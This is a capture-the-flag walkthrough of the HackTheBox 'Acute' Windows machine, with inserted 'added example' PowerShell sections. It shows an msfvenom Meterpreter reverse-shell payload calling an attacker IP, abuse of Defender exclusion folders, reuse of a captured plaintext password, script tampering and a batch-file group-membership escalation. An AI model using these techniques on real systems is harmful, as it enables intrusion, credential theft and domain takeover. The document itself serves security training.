HackTheBox walkthrough
Introduction
OS: Windows | Difficulty: Hard | Points: 40 | Release: 12 Feb 2022 | IP: 10.10.11.145
Enumeration
NMAP
```
┌──(root💀kali)-[~/hackthebox/machine/acute]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.145
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Only one TCP port is open, and the TLS service on it gives us the hostname (atsserver.acute.local). Let's add it to our hosts file and browse to the site over HTTPS.
It looks like a healthcare website. Under 'About Us' you will find employee names, and from the top right corner a document link, 'New Starter Forms'.
Download the document. It is an induction checklist for new employees, and it gives us a couple of crucial things.
IT overview
Arrange for the new starter to receive a demonstration on using IT tools which may include MUSE, myJob and Google accounts. Walk the new starter through the password change policy, they will need to change it from the default Password1!. Not all staff are changing these so please be sure to run through this.
The default password is Password1!, and some staff members are still using it. We also learn that there is a PSWA (PowerShell Web Access) gateway with a session configuration named dc_manage.
Initial Probation Meeting (For Academic staff on Probation only)
Arrange initial probation meeting between Probationer, Head of Department and Probation Adviser.
Run through the new PSWA to highlight the restrictions set on the sessions named dc_manage.
The probation plan should be completed within a month of the start date and should include a requirement to register with LETs re: rate to gain within 3 months of starting. Fellowship of the Higher Education Academy (FHEA).
We also have the link to the PSWA: https://atsserver.acute.local/Acute_Staff_Access
Induction meetings with management staff
Arrange for the new starter to meet with other staff in the department as appropriate. This could include the Head of Department and/or other members of the appointee’s team. Complete the https://atsserver.acute.local/Acute_Staff_Access training
Induction Coordinator
So we can reach a remote PowerShell session through the browser. Lastly, the document states that Lois has the highest privileges: she is the only one who can change the membership of the 'site admin' group.
**Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **
Now that we have a few things in the loot box, let's access the PSWA.
We need a username, a password and a computer name. So far we have employee names from the website and the default password, but we don't have a computer name.
Running exiftool on the downloaded docx file gives us the remaining information.
```
┌──(root💀kali)-[~/hackthebox/machine/acute]
└─# exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number         : 12.39
File Name                       : New_Starter_CheckList_v7.docx
Directory                       : .
File Size                       : 34 KiB
File Modification Date/Time     : 2022:02:16 10:07:39-05:00
File Access Date/Time           : 2022:02:16 10:09:02-05:00
File Inode Change Date/Time     : 2022:02:16 10:08:07-05:00
File Permissions                : -rw-r--r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x079b7eb2
Zip Compressed Size             : 428
Zip Uncompressed Size           : 2527
Zip File Name                   : [Content_Types].xml
Creator                         : FCastle
Description                     : Created on Acute-PC01
Last Modified By                : Daniel
Revision Number                 : 8
Last Printed                    : 2021:01:04 15:54:00Z
Create Date                     : 2021:12:08 14:21:00Z
Modify Date                     : 2021:12:22 00:39:00Z
Template                        : Normal.dotm
Total Edit Time                 : 2.6 hours
Pages                           : 3
Words                           : 886
Characters                      : 5055
Application                     : Microsoft Office Word
Doc Security                    : None
Lines                           : 42
Paragraphs                      : 11
Scale Crop                      : No
Heading Pairs                   : Title, 1
Titles Of Parts                 :
Company                         : University of Marvel
Links Up To Date                : No
Characters With Spaces          : 5930
Shared Doc                      : No
Hyperlinks Changed              : No
App Version                     : 16.0000
```
From this metadata we get two things: the computer name, Acute-PC01, from the Description field, and the username format from the Creator field, FCastle (first initial followed by surname). With the employee names from the website we can build usernames in that format and try them with Password1! against the PSWA. Let's log in.
We land in a session as edavies on ACUTE-PC01, and its IP address is different from the machine's IP. It looks like a container or virtual machine (Hyper-V). We can ping the gateway IP address, 172.16.22.1.
Let's check for open ports on the gateway IP address.
```
PS C:\Users\edavies\Documents> Test-NetConnection 172.16.22.1 -port 445

ComputerName     : 172.16.22.1
RemoteAddress    : 172.16.22.1
RemotePort       : 445
InterfaceAlias   :
SourceAddress    :
TcpTestSucceeded : True
```
Port 445 is open. To find the rest of the open ports on the gateway we can run a PowerShell port-scan script on the box.
Pulling the script in with IEX (Invoke-Expression) downloads and executes it in memory. If you download it to disk and run it manually (via curl or any other method) it does not work; a script on disk goes through the execution policy and Defender's on-access scanning, which is the likely reason. Run the scanner against the gateway and dump the results to a file.
After a couple of minutes we can check the open ports written to that file.
Get-Content .\ports_open_gateway
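As an added example (not the script the author pulled in with IEX), here is a self-contained TCP connect scanner in PowerShell. It needs no download at all, so it sidesteps the download-and-run problem entirely; the port list, the timeout and the output file name are my assumptions, chosen to match what the walkthrough reads back with Get-Content.

```powershell
# Added example, not from the original walkthrough. Assumptions: target is the
# gateway 172.16.22.1, the port list below, a 500 ms connect timeout, and the
# output file .\ports_open_gateway.
function Test-TcpPorts {
    param(
        [Parameter(Mandatory)][string]$Target,
        [int[]]$Ports = @(53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 5986),
        [int]$TimeoutMs = 500
    )
    foreach ($p in $Ports) {
        $client = New-Object System.Net.Sockets.TcpClient
        try {
            # Asynchronous connect so a filtered port costs at most $TimeoutMs,
            # unlike Test-NetConnection which waits for the full TCP timeout.
            $ar = $client.BeginConnect($Target, $p, $null, $null)
            if ($ar.AsyncWaitHandle.WaitOne($TimeoutMs) -and $client.Connected) {
                [pscustomobject]@{ Port = $p; State = 'open' }
            }
        } catch {
            # Connection refused or host unreachable: treat as closed.
        } finally {
            $client.Close()
        }
    }
}

# Scan the low ports plus the usual AD/WinRM ports and keep the result on disk,
# the same way the walkthrough reads it back later.
$ports = @(1..1024) + @(3268, 3269, 5985, 5986)
Test-TcpPorts -Target 172.16.22.1 -Ports $ports | Out-File .\ports_open_gateway
Get-Content .\ports_open_gateway
```

A connect scan from inside the VM is noisy on the DC (one full handshake per open port), but it is the only option when no tooling can be dropped to disk.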
Kerberos and LDAP are listening, so this IP is most likely the Domain Controller. Let's get a real shell by uploading a reverse shell executable. If we try to run the executable from either the home directory or ProgramData, we get an error message.
```
┌──(root💀kali)-[~/hackthebox/machine/acute]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
```
Antivirus is running and killing the payload, most likely Defender. We can query the registry for the Defender exclusion (whitelisted) paths under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths.
Two folders are excluded from scanning. We can use the 'utils' directory to execute our payload: download the executable there and run it.
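The registry query the author ran is not shown on the page. As an added example (not from the walkthrough), the following enumerates Defender exclusion paths from both the registry key named above and Get-MpPreference, then tests which of them the current user can actually write to, which is the property that matters when picking a drop directory.

```powershell
# Added example, not from the original walkthrough. Lists Defender path
# exclusions and probes each one for write access as the current user.
function Get-WritableDefenderExclusions {
    $paths = @()

    # Source 1: the registry. Standard users can usually read this key even
    # when they cannot run the Defender cmdlets.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths'
    if (Test-Path -LiteralPath $key) {
        # Exclusions are stored as value *names* (data is always 0).
        $paths += (Get-Item -LiteralPath $key).Property
    }

    # Source 2: the Defender module, when it is available and not blocked.
    try {
        $paths += (Get-MpPreference -ErrorAction Stop).ExclusionPath
    } catch {
        # Module missing or access denied: fall back to the registry only.
    }

    foreach ($p in ($paths | Where-Object { $_ } | Sort-Object -Unique)) {
        $writable = $false
        if (Test-Path -LiteralPath $p -PathType Container) {
            # Probe with a random file name and remove it again; this is the
            # only reliable way to learn the effective ACL for the current token.
            $probe = Join-Path $p ([IO.Path]::GetRandomFileName())
            try {
                [IO.File]::WriteAllText($probe, '')
                Remove-Item -LiteralPath $probe -Force
                $writable = $true
            } catch {
                # Access denied: the path is excluded but not usable by us.
            }
        }
        [pscustomobject]@{ Path = $p; Writable = $writable }
    }
}

Get-WritableDefenderExclusions | Format-Table -AutoSize
```

An exclusion only helps if the current user can write to it; a path excluded for a service account is useless for dropping a payload, so the writability column is the one to act on.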
```
[*] Started reverse TCP handler on 10.10.14.30:9001
[*] Sending stage (200262 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.14.30:9001 -> 10.10.11.145:49778) at 2022-02-16 12:14:39 -0500

meterpreter > getuid
Server username: ACUTE\edavies
```
Alright, we have working shell now. Let’s switch to powershell and enumerate.
```
PS C:\utils> net user edavies /domain
The request will be processed at a domain controller for domain acute.local.

System error 1722 has occurred.

The RPC server is unavailable.
```
Any attempt to query the domain from this box gives the error above: the VM cannot reach the DC's RPC endpoints, so we can't query the domain for anything from here. Let's run WinPEAS and look for local privilege escalation paths.
```
RDP Sessions
SessID  pSessionName  pUserName  pDomainName  State   SourceIP
1       Console       edavies    ACUTE        Active
```
WinPEAS reports an active console (RDP) session for the 'edavies' user. An RDP session is an interactive desktop, not a command line, so something may be happening on screen that we cannot see from our shell.
Since our meterpreter session runs as edavies, we can watch that desktop with the screenshare command:

```
meterpreter > screenshare -q 100 -d 5000
```

It starts streaming the GUI; open the player path it prints in a browser to view it. After waiting a couple of minutes, a PowerShell window pops up and starts running PowerShell commands.
Based on the commands being typed, something is starting a new PowerShell session with another user's (imonks) password, and it passes a session configuration name to reach that session.
We could have used that password to log in via RDP, but RDP is not enabled on the main host (the Hyper-V host, not the guest), so we have to reuse the same technique from our shell.
```
PS C:\utils> $pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
PS C:\utils> Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage -credential $cred
Enter-PSSession : The term 'Measure-Object' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Measure-Object:String) [Enter-PSSession], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
```
We get the same error that appeared in the RDP screen: the 'Measure-Object' cmdlet is not recognized.
It is available to the 'edavies' user locally but not to 'imonks' inside the dc_manage endpoint. A constrained session configuration exposes only a whitelist of commands, and Enter-PSSession needs Measure-Object to set up an interactive session, so the interactive path is blocked. The credentials are not wrong, however, so we can use Invoke-Command with a script block to run individual commands through the endpoint.
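As an added example (not the author's command line), the same credentials used through Invoke-Command against the constrained endpoint. The wrapper function and the assumption that Get-Command is exposed by the endpoint are mine; Get-Command is normally present in a RestrictedRemoteServer-style configuration, but this endpoint has already shown it removes cmdlets that are usually there.

```powershell
# Added example, not from the original walkthrough: run single commands
# through the constrained dc_manage endpoint instead of an interactive
# session. The credentials are the ones captured from the RDP screen above.
$pass = ConvertTo-SecureString 'W3_4R3_th3_f0rce.' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('acute\imonks', $pass)

function Invoke-DcManage {
    param(
        [Parameter(Mandatory)][scriptblock]$ScriptBlock,
        [object[]]$ArgumentList = @()
    )
    Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage `
        -Credential $cred -ScriptBlock $ScriptBlock -ArgumentList $ArgumentList
}

# 1. Learn what the endpoint actually exposes. Assumes Get-Command is visible;
#    if it is not, this call fails with CommandNotFoundException just like
#    Enter-PSSession did.
Invoke-DcManage { Get-Command }

# 2. Domain queries run on the DC itself, so they work here even though the
#    VM cannot reach the DC over RPC and Enter-PSSession is refused.
Invoke-DcManage { net user imonks /domain }
Invoke-DcManage { net group Managers /domain }

# 3. Remote script blocks do not see local variables; pass them explicitly.
$target = 'awallace'
Invoke-DcManage { param($u) net user $u /domain } -ArgumentList $target
```

Step 1 is worth doing first on any constrained endpoint: the visible command list tells you whether a file write (Set-Content, Out-File) or a process start is even possible before you spend time on it.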
```
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            21/12/2021 14:51:31
Password expires             Never
Password changeable          22/12/2021 14:51:31
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   16/02/2022 17:47:45

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Managers
The command completed successfully.
```
The 'imonks' user is a member of the 'Managers' group. Let's find out who else is a member of that group.
```
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            21/12/2021 14:50:36
Password expires             Never
Password changeable          22/12/2021 14:50:36
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   23/12/2021 09:15:29

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Managers
The command completed successfully.
```
User 'awallace' is also a member of the Managers group. To enumerate AD properly we want shell access as imonks, but the constrained endpoint does not let us run anything useful that would execute our own binaries directly, so we need another route.
Reading this script, it builds a secure-string password and a credential for 'jmorgan' and runs 'Get-Volume' in jmorgan's context through Invoke-Command. We can edit the script and change the command it invokes.
Replacing the Get-Volume string with cmd.exe /c c:\utils\msf.exe makes it launch our payload instead. We already have our reverse shell executable (reverse.exe) in the utils directory; whatever file name ends up in the script must match the payload actually sitting in that folder. Once the modified script runs, we get the reverse connection in Metasploit. Read the file back first to make sure the command is good to go.
```
Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
```
'jmorgan' is a member of BUILTIN\Administrators (local admin on ACUTE-PC01) and the process already runs at High integrity, so we can elevate straight to SYSTEM.
```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
We may have pwned the admin, but this is the Hyper-V guest, not the actual host. You can confirm by running ipconfig.
```
Started: Thu Feb 17 02:09:11 2022
Stopped: Thu Feb 17 02:09:32 2022
```
The crack finishes in about twenty seconds and we get a password. For a hard machine it is quite weak. I tried to use this password to get hold of ATSSERVER (the host), but was not able to. However, we still have the 'edavies' shell, and the dc_manage endpoint lets us run commands from a different user's context. Earlier, when we queried the domain for members of the Managers group, there was one more user, awallace; let's try this password from that user's context.
Make sure you run the next command from the 'edavies' user shell.
It worked: we can now run commands in awallace's context. There is not much in the user's directory, but earlier we noticed an unusual directory on the C drive; let's see whether we can access it with this user's permissions.
```batch
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
```
This looks like a scheduled script: it runs every five minutes, recurses (for /R) through the directory it lives in looking for .bat files, and calls every one it finds except itself (%~0). The key information is the comment: the script is for Lois only, and we already know from the DOCX that Lois is the only user who can change group membership.
So we can create a batch file that adds the 'awallace' user to the 'site admin' group.
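Putting the last two steps together, as an added example (not the author's commands): run commands as awallace from the edavies shell through the same dc_manage endpoint, drop a one-line batch file where the scheduled script will find it, and poll group membership until the next five-minute run has picked it up. The directory path, the exact group name, the batch file name and awallace's password are assumptions; the page does not show them, so the password is read at runtime and the path is a placeholder you must fill in.

```powershell
# Added example, not from the original walkthrough. Assumptions: $DropDir is
# the directory the "Lois only" scheduled script walks, the group is called
# "site admin", and awallace's password (not shown on the page) is typed in.
$cred = New-Object System.Management.Automation.PSCredential(
    'acute\awallace', (Read-Host 'awallace password' -AsSecureString))

function Invoke-AsAwallace {
    param(
        [Parameter(Mandatory)][scriptblock]$ScriptBlock,
        [object[]]$ArgumentList = @()
    )
    Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage `
        -Credential $cred -ScriptBlock $ScriptBlock -ArgumentList $ArgumentList
}

$DropDir = 'C:\<directory walked by the scheduled script>'   # assumption: fill in
$Group   = 'site admin'                                       # assumption
$BatName = Join-Path $DropDir 'addme.bat'                     # assumption

# The scheduled script runs as Lois and calls every *.bat under $DropDir, so a
# single net.exe line is enough; /domain makes the change on the DC.
$payload = "net group `"$Group`" awallace /add /domain`r`n"

# Write the file through the endpoint. This assumes Set-Content is among the
# commands the endpoint exposes; check with Get-Command first if unsure.
Invoke-AsAwallace { param($p, $c) Set-Content -Path $p -Value $c -NoNewline } `
    -ArgumentList $BatName, $payload

# Poll (up to six minutes) until the next run has added us to the group.
for ($i = 0; $i -lt 12; $i++) {
    $members = Invoke-AsAwallace { param($g) net group "$g" /domain } -ArgumentList $Group
    if ($members -match '\bawallace\b') {
        $members
        break
    }
    Start-Sleep -Seconds 30
}
```

Because the batch file is executed by whatever account runs the scheduled script, the group change succeeds only if that account (Lois) really holds the right the document describes; the poll loop is the check that it did.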